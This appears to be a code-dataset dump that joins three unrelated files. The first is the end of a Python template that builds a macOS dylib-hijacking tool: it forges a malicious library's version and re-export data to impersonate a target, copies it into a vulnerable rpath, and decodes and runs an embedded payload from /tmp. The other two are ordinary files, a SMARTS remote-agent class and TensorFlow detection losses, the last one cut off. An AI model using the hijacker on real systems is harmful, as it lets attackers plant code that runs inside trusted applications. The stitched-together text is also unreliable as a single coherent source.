LC_SEGMENT, LC_SYMTAB, LC_SYMSEG, LC_THREAD, LC_UNIXTHREAD, LC_LOADFVMLIB,
LC_IDFVMLIB, LC_IDENT, LC_FVMFILE, LC_PREPAGE, LC_DYSYMTAB, LC_LOAD_DYLIB,
LC_ID_DYLIB, LC_LOAD_DYLINKER, LC_ID_DYLINKER, LC_PREBOUND_DYLIB,
LC_ROUTINES, LC_SUB_FRAMEWORK, LC_SUB_UMBRELLA, LC_SUB_CLIENT,
LC_SUB_LIBRARY, LC_TWOLEVEL_HINTS, LC_PREBIND_CKSUM
) = range(0x1, 0x18)
MH_MAGIC = 0xfeedface
MH_CIGAM = 0xcefaedfe
MH_MAGIC_64 = 0xfeedfacf
MH_CIGAM_64 = 0xcffaedfe
_CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_NAMES = {
-1: 'ANY',
1: 'VAX',
6: 'MC680x0',
7: 'i386',
_CPU_ARCH_ABI64 | 7: 'x86_64',
8: 'MIPS',
10: 'MC98000',
11: 'HPPA',
12: 'ARM',
13: 'MC88000',
14: 'SPARC',
15: 'i860',
16: 'Alpha',
18: 'PowerPC',
_CPU_ARCH_ABI64 | 18: 'PowerPC64',
}
#structs that we need
class mach_header(ctypes.Structure):
_fields_ = [
("magic", ctypes.c_uint),
("cputype", ctypes.c_uint),
("cpusubtype", ctypes.c_uint),
("filetype", ctypes.c_uint),
("ncmds", ctypes.c_uint),
("sizeofcmds", ctypes.c_uint),
("flags", ctypes.c_uint)
]
class mach_header_64(ctypes.Structure):
_fields_ = mach_header._fields_ + [('reserved',ctypes.c_uint)]
class load_command(ctypes.Structure):
_fields_ = [
("cmd", ctypes.c_uint),
("cmdsize", ctypes.c_uint)
]
LC_HEADER_SIZE = 0x8
def checkPrereqs(attackerDYLIB, targetDYLIB):
if not os.path.exists(attackerDYLIB):
print 'ERROR: dylib \\'%%s\\' not found' %% (attackerDYLIB)
return False
if not os.path.exists(targetDYLIB):
print 'ERROR: dylib \\'%%s\\' not found' %% (targetDYLIB)
return False
attacker = open(attackerDYLIB)
target = open(targetDYLIB)
attackerHeader = mach_header.from_buffer_copy(attacker.read(28))
targetHeader = mach_header.from_buffer_copy(target.read(28))
if attackerHeader.cputype != targetHeader.cputype:
print 'ERROR: Architecture mismatch'
attacker.close()
target.close()
return False
return True
def findLoadCommand(fileHandle, targetLoadCommand):
MACHHEADERSZ64 = 32
MACHHEADERSZ = 28
matchedOffsets = []
#wrap
try:
header = mach_header.from_buffer_copy(fileHandle.read(MACHHEADERSZ))
if header.magic == MH_MAGIC_64:
fileHandle.seek(0, io.SEEK_SET)
header = mach_header_64.from_buffer_copy(fileHandle.read(MACHHEADERSZ64))
ncmds = header.ncmds
# Get to the load commands
current = fileHandle.tell() #save offset to load command
for cmd in range(ncmds):
offset = current
lc = load_command.from_buffer_copy(fileHandle.read(LC_HEADER_SIZE))
size = lc.cmdsize
if lc.cmd == targetLoadCommand:
matchedOffsets.append(offset)
fileHandle.seek(size - LC_HEADER_SIZE, io.SEEK_CUR)
current = fileHandle.tell()
#exceptions
except Exception, e:
#err msg
print 'EXCEPTION (finding load commands): %%s' %% e
#reset
matchedOffsets = None
return matchedOffsets
#configure version info
# 1) find/extract version info from target .dylib
# 2) find/update version info from hijacker .dylib to match target .dylib
def configureVersions(attackerDYLIB, targetDYLIB):
#wrap
try:
#dbg msg
print ' [+] parsing \\'%%s\\' to extract version info' %% (os.path.split(targetDYLIB)[1])
#open target .dylib
fileHandle = open(targetDYLIB, 'rb')
#find LC_ID_DYLIB load command
# ->and check
versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB)
if not versionOffsets or not len(versionOffsets):
#err msg
print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(targetDYLIB)[1])
#bail
return False
#dbg msg
print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets)
#seek to offset of LC_ID_DYLIB
fileHandle.seek(versionOffsets[0], io.SEEK_SET)
#seek to skip over LC header and timestamp
fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR)
'''
struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; };
'''
#extract current version
currentVersion = fileHandle.read(4)
#extract compatibility version
compatibilityVersion = fileHandle.read(4)
#dbg msg(s)
print ' extracted current version: 0x%%x' %% (struct.unpack('<L', currentVersion)[0])
print ' extracted compatibility version: 0x%%x' %% (struct.unpack('<L', compatibilityVersion)[0])
#close
fileHandle.close()
#dbg msg
print ' [+] parsing \\'%%s\\' to find version info' %% (os.path.split(attackerDYLIB)[1])
#open target .dylib
fileHandle = open(attackerDYLIB, 'rb+')
#find LC_ID_DYLIB load command
# ->and check
versionOffsets = findLoadCommand(fileHandle, LC_ID_DYLIB)
if not versionOffsets or not len(versionOffsets):
#err msg
print 'ERROR: failed to find \\'LC_ID_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1])
#bail
return False
#dbg msg(s)
print ' found \\'LC_ID_DYLIB\\' load command at offset(s): %%s' %% (versionOffsets)
print ' [+] updating version info in %%s to match %%s' %% ((os.path.split(attackerDYLIB)[1]), (os.path.split(targetDYLIB)[1]))
#update version info
for versionOffset in versionOffsets:
#seek to offset of LC_ID_DYLIB
fileHandle.seek(versionOffset, io.SEEK_SET)
#seek to skip over LC header and timestamp
fileHandle.seek(LC_HEADER_SIZE+0x8, io.SEEK_CUR)
#dbg msg
print 'setting version info at offset %%s' %% (versionOffset)
#set current version
fileHandle.write(currentVersion)
#set compatibility version
fileHandle.write(compatibilityVersion)
#close
fileHandle.close()
except Exception, e:
#err msg
print 'EXCEPTION (configuring version info): %%s' %% e
return True
#configure re-export
# ->update hijacker .dylib to re-export everything to target .dylib
def configureReExport(attackerDYLIB, targetDYLIB):
#wrap
try:
#dbg msg
print ' [+] parsing \\'%%s\\' to extract faux re-export info' %% (os.path.split(attackerDYLIB)[1])
#open attacker's .dylib
fileHandle = open(attackerDYLIB, 'rb+')
#find LC_REEXPORT_DYLIB load command
# ->and check
reExportOffsets = findLoadCommand(fileHandle, LC_REEXPORT_DYLIB)
if not reExportOffsets or not len(reExportOffsets):
#err msg
print 'ERROR: failed to find \\'LC_REEXPORT_DYLIB\\' load command in %%s' %% (os.path.split(attackerDYLIB)[1])
#bail
return False
#dbg msg
print ' found \\'LC_REEXPORT_DYLIB\\' load command at offset(s): %%s' %% (reExportOffsets)
'''
struct dylib { union lc_str name; uint_32 timestamp; uint_32 current_version; uint_32 compatibility_version; };
'''
#update re-export info
#TODO: does the current and compat version need to match? we can easily set it
for reExportOffset in reExportOffsets:
#seek to offset of LC_REEXPORT_DYLIB
fileHandle.seek(reExportOffset, io.SEEK_SET)
#seek to skip over command
fileHandle.seek(0x4, io.SEEK_CUR)
#read in size of load command
commandSize = struct.unpack('<L', fileHandle.read(4))[0]
#dbg msg
print ' extracted LC command size: 0x%%x' %% (commandSize)
#read in path offset
pathOffset = struct.unpack('<L', fileHandle.read(4))[0]
#dbg msg
print ' extracted path offset: 0x%%x' %% (pathOffset)
#seek to path offset
fileHandle.seek(reExportOffset + pathOffset, io.SEEK_SET)
#calc length of path
# it makes up rest of load command data
pathSize = commandSize - (fileHandle.tell() - reExportOffset)
#dbg msg
print ' computed path size: 0x%%x' %% (pathSize)
#read out path
data = targetDYLIB + '\\0' * (pathSize - len(targetDYLIB))
fileHandle.write(data)
#path can include NULLs so lets chop those off
#path = path.rstrip('\0')
#dbg msg(s)
#print ' extracted faux path: %%s' %% (path)
#close
fileHandle.close()
#dbg msg
print ' [+] updated embedded re-export'
#wrap
#handle exceptions
except Exception, e:
#err msg
print 'EXCEPTION (configuring re-exports): %%s' %% e
#bail
return False
return True
def configure(attackerDYLIB, targetDYLIB):
#configure version info
# ->update attacker's .dylib to match target .dylib's version info
if not configureVersions(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure version info'
#bail
return False
#configure re-export
# ->update attacker's .dylib to re-export everything to target .dylib
if not configureReExport(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure re-export'
#bail
return False
return True
#target .dylib
targetDYLIB = "%s"
vrpath = "%s"
#configured .dylib
configuredDYLIB = ""
#init output path for configured .dylib
configuredDYLIB = os.path.split(attackerDYLIB)[0]+'/' + os.path.split(targetDYLIB)[1]
#dbg msg
print ' [+] configuring %%s to hijack %%s' %% (os.path.split(attackerDYLIB)[1], os.path.split(targetDYLIB)[1])
#check prereqs
# ->i.e. sanity checks
if not checkPrereqs(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: prerequisite check failed\\n'
#bail
return ""
#configure the provided .dylib
if not configure(attackerDYLIB, targetDYLIB):
#err msg
print 'ERROR: failed to configure %%s\\n' %% (os.path.split(targetDYLIB)[1])
#bail
return ""
#dbg msg
print ' [+] copying configured .dylib to %%s' %% (configuredDYLIB)
#make a (local) copy w/ name
shutil.copy2(attackerDYLIB, configuredDYLIB)
os.remove(attackerDYLIB)
if not os.path.exists(os.path.split(vrpath)[0]):
os.makedirs(os.path.split(vrpath)[0])
os.chmod(configuredDYLIB, 0777)
shutil.copy2(configuredDYLIB, vrpath)
os.remove(configuredDYLIB)
#dbg msg
print '\\nHijacker created, renamed to %%s, and copied to %%s' %% (configuredDYLIB,vrpath)
import base64
import uuid
encbytes = "%s"
filename = str(uuid.uuid4())
path = "/tmp/" + filename + ".dylib"
decodedDylib = base64.b64decode(encbytes)
temp = open(path,'wb')
temp.write(decodedDylib)
temp.close()
run(path)
""" % (dylib,vrpath,encodedDylib)
return script
| 32.180505
| 279
| 0.558728
|
991ba12b1c0cde1e4c18f108f09a865fe803c415
| 4,576
|
py
|
Python
|
smarts/core/remote_agent.py
|
zbzhu99/SMARTS
|
652aa23e71bd4e2732e2742140cfcd0ec082a7da
|
[
"MIT"
] | null | null | null |
smarts/core/remote_agent.py
|
zbzhu99/SMARTS
|
652aa23e71bd4e2732e2742140cfcd0ec082a7da
|
[
"MIT"
] | null | null | null |
smarts/core/remote_agent.py
|
zbzhu99/SMARTS
|
652aa23e71bd4e2732e2742140cfcd0ec082a7da
|
[
"MIT"
] | null | null | null |
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import time
from concurrent import futures
from typing import Tuple
import cloudpickle
import grpc
from smarts.core.agent import AgentSpec
from smarts.zoo import manager_pb2, manager_pb2_grpc, worker_pb2, worker_pb2_grpc
class RemoteAgentException(Exception):
"""An exception describing issues relating to maintaining connection with a remote agent."""
pass
class RemoteAgent:
"""A remotely controlled agent."""
def __init__(
self,
manager_address: Tuple[str, int],
worker_address: Tuple[str, int],
timeout: float = 10,
):
"""Executes an agent in a worker (i.e., a gRPC server).
Args:
manager_address (Tuple[str,int]): Manager's server address (ip, port).
worker_address (Tuple[str,int]): Worker's server address (ip, port).
timeout (float, optional): Time (seconds) to wait for startup or response from
server. Defaults to 10.
Raises:
RemoteAgentException: If timeout occurs while connecting to the manager or worker.
"""
self._log = logging.getLogger(self.__class__.__name__)
# Track the last action future.
self._act_future = None
self._manager_channel = grpc.insecure_channel(
f"{manager_address[0]}:{manager_address[1]}"
)
self._worker_address = worker_address
self._worker_channel = grpc.insecure_channel(
f"{worker_address[0]}:{worker_address[1]}"
)
try:
# Wait until the grpc server is ready or timeout seconds.
grpc.channel_ready_future(self._manager_channel).result(timeout=timeout)
grpc.channel_ready_future(self._worker_channel).result(timeout=timeout)
except grpc.FutureTimeoutError as e:
raise RemoteAgentException(
"Timeout while connecting to remote worker process."
) from e
self._manager_stub = manager_pb2_grpc.ManagerStub(self._manager_channel)
self._worker_stub = worker_pb2_grpc.WorkerStub(self._worker_channel)
def act(self, obs):
"""Call the agent's act function asynchronously and return a Future."""
self._act_future = self._worker_stub.act.future(
worker_pb2.Observation(payload=cloudpickle.dumps(obs))
)
return self._act_future
def start(self, agent_spec: AgentSpec):
"""Send the AgentSpec to the agent runner."""
# Cloudpickle used only for the agent_spec to allow for serialization of lambdas.
self._worker_stub.build(
worker_pb2.Specification(payload=cloudpickle.dumps(agent_spec))
)
def terminate(self):
"""Close the agent connection and invalidate this agent."""
# If the last action future returned is incomplete, cancel it first.
if (self._act_future is not None) and (not self._act_future.done()):
self._act_future.cancel()
try:
# Stop the remote worker process
self._manager_stub.stop_worker(
manager_pb2.Port(num=self._worker_address[1])
)
# Close manager channel
self._manager_channel.close()
except grpc.RpcError as e:
if e.code() == grpc.StatusCode.UNAVAILABLE:
# Do nothing as RPC server has been terminated.
pass
else:
raise e
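# -----------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). The endpoint
# addresses below and the helper name are hypothetical; a real setup requires a
# running zoo manager and a worker gRPC server reachable at those addresses.
def _example_remote_agent_usage(agent_spec: AgentSpec, obs) -> None:
    agent = RemoteAgent(
        manager_address=("localhost", 8953),  # assumed manager endpoint
        worker_address=("localhost", 8954),  # assumed worker endpoint
        timeout=10,
    )
    try:
        # Ship the AgentSpec to the worker, then request one action.
        agent.start(agent_spec)
        response = agent.act(obs).result()  # block on the returned gRPC future
        print("worker response:", response)
    finally:
        # Always stop the worker and close the channels.
        agent.terminate()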
| 39.791304
| 96
| 0.676136
|
767ad8c1fb199395d7adcc0eed8ac61081bbe743
| 23,017
|
py
|
Python
|
mobile_deployment/tensorflow/slim/models/official/vision/detection/modeling/losses.py
|
zhoudaquan/rethinking_bottleneck_structure_code_release
|
195ee737952e2f8d729a14b51651748caf35794c
|
[
"BSD-3-Clause-Clear"
] | 153
|
2020-10-25T13:58:04.000Z
|
2022-03-07T06:01:54.000Z
|
official/vision/detection/modeling/losses.py
|
MissMonster/models
|
5a68ac6245993ae351f6b9aca6b22d38cc4bdda1
|
[
"Apache-2.0"
] | 11
|
2020-07-13T08:29:00.000Z
|
2022-03-24T07:21:09.000Z
|
official/vision/detection/modeling/losses.py
|
MissMonster/models
|
5a68ac6245993ae351f6b9aca6b22d38cc4bdda1
|
[
"Apache-2.0"
] | 23
|
2020-10-25T14:44:47.000Z
|
2021-03-31T02:12:13.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Losses used for detection models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import logging
import tensorflow as tf
def focal_loss(logits, targets, alpha, gamma, normalizer):
"""Compute the focal loss between `logits` and the golden `target` values.
Focal loss = -(1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
Args:
logits: A float32 tensor of size
[batch, height_in, width_in, num_predictions].
targets: A float32 tensor of size
[batch, height_in, width_in, num_predictions].
alpha: A float32 scalar multiplying alpha to the loss from positive examples
and (1-alpha) to the loss from negative examples.
gamma: A float32 scalar modulating loss from hard and easy examples.
normalizer: A float32 scalar normalizes the total loss from all examples.
Returns:
loss: A float32 Tensor of size [batch, height_in, width_in, num_predictions]
representing normalized loss on the prediction map.
"""
with tf.name_scope('focal_loss'):
positive_label_mask = tf.math.equal(targets, 1.0)
cross_entropy = (
tf.nn.sigmoid_cross_entropy_with_logits(labels=targets, logits=logits))
# Below are comments/derivations for computing modulator.
# For brevity, let x = logits, z = targets, r = gamma, and p_t = sigmoid(x)
# for positive samples and 1 - sigmoid(x) for negative examples.
#
# The modulator, defined as (1 - P_t)^r, is a critical part in focal loss
# computation. For r > 0, it puts more weights on hard examples, and less
# weights on easier ones. However if it is directly computed as (1 - P_t)^r,
# its back-propagation is not stable when r < 1. The implementation here
# resolves the issue.
#
# For positive samples (labels being 1),
# (1 - p_t)^r
# = (1 - sigmoid(x))^r
# = (1 - (1 / (1 + exp(-x))))^r
# = (exp(-x) / (1 + exp(-x)))^r
# = exp(log((exp(-x) / (1 + exp(-x)))^r))
# = exp(r * log(exp(-x)) - r * log(1 + exp(-x)))
# = exp(- r * x - r * log(1 + exp(-x)))
#
# For negative samples (labels being 0),
# (1 - p_t)^r
# = (sigmoid(x))^r
# = (1 / (1 + exp(-x)))^r
# = exp(log((1 / (1 + exp(-x)))^r))
# = exp(-r * log(1 + exp(-x)))
#
# Therefore one unified form for positive (z = 1) and negative (z = 0)
# samples is:
# (1 - p_t)^r = exp(-r * z * x - r * log(1 + exp(-x))).
neg_logits = -1.0 * logits
modulator = tf.math.exp(gamma * targets * neg_logits -
gamma * tf.math.log1p(tf.math.exp(neg_logits)))
loss = modulator * cross_entropy
weighted_loss = tf.where(positive_label_mask, alpha * loss,
(1.0 - alpha) * loss)
weighted_loss /= normalizer
return weighted_loss
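# A small, illustrative sanity check (not part of the original module): it
# numerically verifies the algebraic identity derived in the comments above,
# i.e. that exp(-r * z * x - r * log(1 + exp(-x))) equals (1 - p_t)^r for both
# z = 1 and z = 0. Plain NumPy is used and the function name is hypothetical;
# it exists purely for demonstration.
def _check_focal_modulator_identity(x=0.7, gamma=2.0):
  import numpy as np
  p = 1.0 / (1.0 + np.exp(-x))  # sigmoid(x)
  # (z, p_t) pairs: p_t = sigmoid(x) for positives, 1 - sigmoid(x) for negatives.
  for z, p_t in ((1.0, p), (0.0, 1.0 - p)):
    direct = (1.0 - p_t) ** gamma
    stable = np.exp(-gamma * z * x - gamma * np.log1p(np.exp(-x)))
    assert np.isclose(direct, stable), (direct, stable)
  return True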
class RpnScoreLoss(object):
"""Region Proposal Network score loss function."""
def __init__(self, params):
self._rpn_batch_size_per_im = params.rpn_batch_size_per_im
self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy(
reduction=tf.keras.losses.Reduction.SUM, from_logits=True)
def __call__(self, score_outputs, labels):
"""Computes total RPN detection loss.
Computes total RPN detection loss including box and score from all levels.
Args:
score_outputs: an OrderedDict with keys representing levels and values
representing scores in [batch_size, height, width, num_anchors].
labels: the dictionary returned from the dataloader that includes
groundtruth targets.
Returns:
rpn_score_loss: a scalar tensor representing total score loss.
"""
with tf.name_scope('rpn_loss'):
levels = sorted(score_outputs.keys())
score_losses = []
for level in levels:
score_losses.append(
self._rpn_score_loss(
score_outputs[level],
labels[level],
normalizer=tf.cast(
tf.shape(score_outputs[level])[0] *
self._rpn_batch_size_per_im, dtype=tf.float32)))
# Sums per level losses to total loss.
return tf.math.add_n(score_losses)
def _rpn_score_loss(self, score_outputs, score_targets, normalizer=1.0):
"""Computes score loss."""
# score_targets has three values:
# (1) score_targets[i]=1, the anchor is a positive sample.
# (2) score_targets[i]=0, negative.
# (3) score_targets[i]=-1, the anchor is don't care (ignore).
with tf.name_scope('rpn_score_loss'):
mask = tf.math.logical_or(tf.math.equal(score_targets, 1),
tf.math.equal(score_targets, 0))
score_targets = tf.math.maximum(score_targets,
tf.zeros_like(score_targets))
score_targets = tf.expand_dims(score_targets, axis=-1)
score_outputs = tf.expand_dims(score_outputs, axis=-1)
score_loss = self._binary_crossentropy(
score_targets, score_outputs, sample_weight=mask)
score_loss /= normalizer
return score_loss
class RpnBoxLoss(object):
"""Region Proposal Network box regression loss function."""
def __init__(self, params):
logging.info('RpnBoxLoss huber_loss_delta %s', params.huber_loss_delta)
# The delta is typically around the mean value of regression target.
# for instances, the regression targets of 512x512 input with 6 anchors on
# P2-P6 pyramid is about [0.1, 0.1, 0.2, 0.2].
self._huber_loss = tf.keras.losses.Huber(
delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM)
def __call__(self, box_outputs, labels):
"""Computes total RPN detection loss.
Computes total RPN detection loss including box and score from all levels.
Args:
box_outputs: an OrderedDict with keys representing levels and values
representing box regression targets in
[batch_size, height, width, num_anchors * 4].
labels: the dictionary returned from the dataloader that includes
groundtruth targets.
Returns:
rpn_box_loss: a scalar tensor representing total box regression loss.
"""
with tf.name_scope('rpn_loss'):
levels = sorted(box_outputs.keys())
box_losses = []
for level in levels:
box_losses.append(self._rpn_box_loss(box_outputs[level], labels[level]))
# Sum per level losses to total loss.
return tf.add_n(box_losses)
def _rpn_box_loss(self, box_outputs, box_targets, normalizer=1.0):
"""Computes box regression loss."""
with tf.name_scope('rpn_box_loss'):
mask = tf.cast(tf.not_equal(box_targets, 0.0), dtype=tf.float32)
box_targets = tf.expand_dims(box_targets, axis=-1)
box_outputs = tf.expand_dims(box_outputs, axis=-1)
box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask)
# The loss is normalized by the sum of non-zero weights and additional
# normalizer provided by the function caller. Using + 0.01 here to avoid
# division by zero.
box_loss /= normalizer * (tf.reduce_sum(mask) + 0.01)
return box_loss
class FastrcnnClassLoss(object):
"""Fast R-CNN classification loss function."""
def __init__(self):
self._categorical_crossentropy = tf.keras.losses.CategoricalCrossentropy(
reduction=tf.keras.losses.Reduction.SUM, from_logits=True)
def __call__(self, class_outputs, class_targets):
"""Computes the class loss (Fast-RCNN branch) of Mask-RCNN.
This function implements the classification loss of the Fast-RCNN.
The classification loss is softmax on all RoIs.
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/fast_rcnn_heads.py # pylint: disable=line-too-long
Args:
class_outputs: a float tensor representing the class prediction for each box
with a shape of [batch_size, num_boxes, num_classes].
class_targets: a float tensor representing the class label for each box
with a shape of [batch_size, num_boxes].
Returns:
a scalar tensor representing total class loss.
"""
with tf.name_scope('fast_rcnn_loss'):
batch_size, num_boxes, num_classes = class_outputs.get_shape().as_list()
class_targets = tf.cast(class_targets, dtype=tf.int32)
class_targets_one_hot = tf.one_hot(class_targets, num_classes)
return self._fast_rcnn_class_loss(class_outputs, class_targets_one_hot,
normalizer=batch_size * num_boxes / 2.0)
def _fast_rcnn_class_loss(self, class_outputs, class_targets_one_hot,
normalizer):
"""Computes classification loss."""
with tf.name_scope('fast_rcnn_class_loss'):
class_loss = self._categorical_crossentropy(class_targets_one_hot,
class_outputs)
class_loss /= normalizer
return class_loss
class FastrcnnBoxLoss(object):
"""Fast R-CNN box regression loss function."""
def __init__(self, params):
logging.info('FastrcnnBoxLoss huber_loss_delta %s', params.huber_loss_delta)
# The delta is typically around the mean value of regression target.
# for instances, the regression targets of 512x512 input with 6 anchors on
# P2-P6 pyramid is about [0.1, 0.1, 0.2, 0.2].
self._huber_loss = tf.keras.losses.Huber(
delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM)
def __call__(self, box_outputs, class_targets, box_targets):
"""Computes the box loss (Fast-RCNN branch) of Mask-RCNN.
This function implements the box regression loss of the Fast-RCNN. As the
`box_outputs` produces `num_classes` boxes for each RoI, the reference model
expands `box_targets` to match the shape of `box_outputs` and selects only
the target that the RoI has a maximum overlap. (Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/fast_rcnn.py) # pylint: disable=line-too-long
Instead, this function selects the `box_outputs` by the `class_targets` so
that it doesn't expand `box_targets`.
The box loss is smooth L1-loss on only positive samples of RoIs.
Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/modeling/fast_rcnn_heads.py # pylint: disable=line-too-long
Args:
box_outputs: a float tensor representing the box prediction for each box
with a shape of [batch_size, num_boxes, num_classes * 4].
class_targets: a float tensor representing the class label for each box
with a shape of [batch_size, num_boxes].
box_targets: a float tensor representing the box label for each box
with a shape of [batch_size, num_boxes, 4].
Returns:
box_loss: a scalar tensor representing total box regression loss.
"""
with tf.name_scope('fast_rcnn_loss'):
class_targets = tf.cast(class_targets, dtype=tf.int32)
# Selects the box from `box_outputs` based on `class_targets`, with which
# the box has the maximum overlap.
(batch_size, num_rois,
num_class_specific_boxes) = box_outputs.get_shape().as_list()
num_classes = num_class_specific_boxes // 4
box_outputs = tf.reshape(box_outputs,
[batch_size, num_rois, num_classes, 4])
box_indices = tf.reshape(
class_targets + tf.tile(
tf.expand_dims(
tf.range(batch_size) * num_rois * num_classes, 1),
[1, num_rois]) + tf.tile(
tf.expand_dims(tf.range(num_rois) * num_classes, 0),
[batch_size, 1]), [-1])
box_outputs = tf.matmul(
tf.one_hot(
box_indices,
batch_size * num_rois * num_classes,
dtype=box_outputs.dtype), tf.reshape(box_outputs, [-1, 4]))
box_outputs = tf.reshape(box_outputs, [batch_size, -1, 4])
return self._fast_rcnn_box_loss(box_outputs, box_targets, class_targets)
def _fast_rcnn_box_loss(self, box_outputs, box_targets, class_targets,
normalizer=1.0):
"""Computes box regression loss."""
with tf.name_scope('fast_rcnn_box_loss'):
mask = tf.tile(tf.expand_dims(tf.greater(class_targets, 0), axis=2),
[1, 1, 4])
mask = tf.cast(mask, dtype=tf.float32)
box_targets = tf.expand_dims(box_targets, axis=-1)
box_outputs = tf.expand_dims(box_outputs, axis=-1)
box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask)
# The loss is normalized by the number of ones in mask and the additional
# normalizer provided by the function caller; + 0.01 is used to avoid
# division by zero.
box_loss /= normalizer * (tf.reduce_sum(mask) + 0.01)
return box_loss
class MaskrcnnLoss(object):
"""Mask R-CNN instance segmentation mask loss function."""
def __init__(self):
self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy(
reduction=tf.keras.losses.Reduction.SUM, from_logits=True)
def __call__(self, mask_outputs, mask_targets, select_class_targets):
"""Computes the mask loss of Mask-RCNN.
This function implements the mask loss of Mask-RCNN. As the `mask_outputs`
produces `num_classes` masks for each RoI, the reference model expands
`mask_targets` to match the shape of `mask_outputs` and selects only the
target that the RoI has a maximum overlap. (Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/mask_rcnn.py) # pylint: disable=line-too-long
Instead, this implementation selects the `mask_outputs` by the `class_targets`
so that it doesn't expand `mask_targets`. Note that the selection logic is
done in the post-processing of mask_rcnn_fn in mask_rcnn_architecture.py.
Args:
mask_outputs: a float tensor representing the prediction for each mask,
with a shape of
[batch_size, num_masks, mask_height, mask_width].
mask_targets: a float tensor representing the binary mask of ground truth
labels for each mask with a shape of
[batch_size, num_masks, mask_height, mask_width].
select_class_targets: a tensor with a shape of [batch_size, num_masks],
representing the foreground mask targets.
Returns:
mask_loss: a float tensor representing total mask loss.
"""
with tf.name_scope('mask_rcnn_loss'):
(batch_size, num_masks, mask_height,
mask_width) = mask_outputs.get_shape().as_list()
weights = tf.tile(
tf.reshape(tf.greater(select_class_targets, 0),
[batch_size, num_masks, 1, 1]),
[1, 1, mask_height, mask_width])
weights = tf.cast(weights, dtype=tf.float32)
mask_targets = tf.expand_dims(mask_targets, axis=-1)
mask_outputs = tf.expand_dims(mask_outputs, axis=-1)
mask_loss = self._binary_crossentropy(mask_targets, mask_outputs,
sample_weight=weights)
# The loss is normalized by the number of 1's in weights and
# + 0.01 is used to avoid division by zero.
return mask_loss / (tf.reduce_sum(weights) + 0.01)
class RetinanetClassLoss(object):
"""RetinaNet class loss."""
def __init__(self, params, num_classes):
self._num_classes = num_classes
self._focal_loss_alpha = params.focal_loss_alpha
self._focal_loss_gamma = params.focal_loss_gamma
def __call__(self, cls_outputs, labels, num_positives):
"""Computes total detection loss.
Computes total detection loss including box and class loss from all levels.
Args:
cls_outputs: an OrderedDict with keys representing levels and values
representing logits in [batch_size, height, width,
num_anchors * num_classes].
labels: the dictionary returned from the dataloader that includes
class groundtruth targets.
num_positives: number of positive examples in the minibatch.
Returns:
a scalar tensor representing total class loss.
"""
# Sums all positives in a batch for normalization and avoids zero
# num_positives_sum, which would lead to inf loss during training
num_positives_sum = tf.reduce_sum(input_tensor=num_positives) + 1.0
cls_losses = []
for level in cls_outputs.keys():
cls_losses.append(self.class_loss(
cls_outputs[level], labels[level], num_positives_sum))
# Sums per level losses to total loss.
return tf.add_n(cls_losses)
def class_loss(self, cls_outputs, cls_targets, num_positives,
ignore_label=-2):
"""Computes RetinaNet classification loss."""
# Onehot encoding for classification labels.
cls_targets_one_hot = tf.one_hot(cls_targets, self._num_classes)
bs, height, width, _, _ = cls_targets_one_hot.get_shape().as_list()
cls_targets_one_hot = tf.reshape(cls_targets_one_hot,
[bs, height, width, -1])
loss = focal_loss(cls_outputs, cls_targets_one_hot,
self._focal_loss_alpha, self._focal_loss_gamma,
num_positives)
ignore_loss = tf.where(
tf.equal(cls_targets, ignore_label),
tf.zeros_like(cls_targets, dtype=tf.float32),
tf.ones_like(cls_targets, dtype=tf.float32),
)
ignore_loss = tf.expand_dims(ignore_loss, -1)
ignore_loss = tf.tile(ignore_loss, [1, 1, 1, 1, self._num_classes])
ignore_loss = tf.reshape(ignore_loss, tf.shape(input=loss))
return tf.reduce_sum(input_tensor=ignore_loss * loss)
class RetinanetBoxLoss(object):
"""RetinaNet box loss."""
def __init__(self, params):
